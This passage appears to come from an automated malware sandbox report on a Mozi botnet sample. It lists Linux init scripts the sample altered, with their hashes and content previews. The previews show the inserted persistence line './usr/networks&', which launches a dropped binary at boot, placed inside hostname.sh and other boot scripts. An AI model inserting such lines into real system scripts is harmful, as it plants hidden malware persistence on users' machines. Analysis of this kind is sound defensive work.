SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
Malicious:true
Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
/etc/init.d/hostname.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):404
Entropy (8bit):5.01878905639229
Encrypted:false
MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
Malicious:true
Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
/etc/init.d/hwclock.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):23
Entropy (8bit):3.882045108136863
Encrypted:false
MD5:D7BC14787BBF05DEAC1113F4B42B6099
SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:true
Preview: ./usr/networks&.exit 1.
/etc/init.d/mountall-bootclean.sh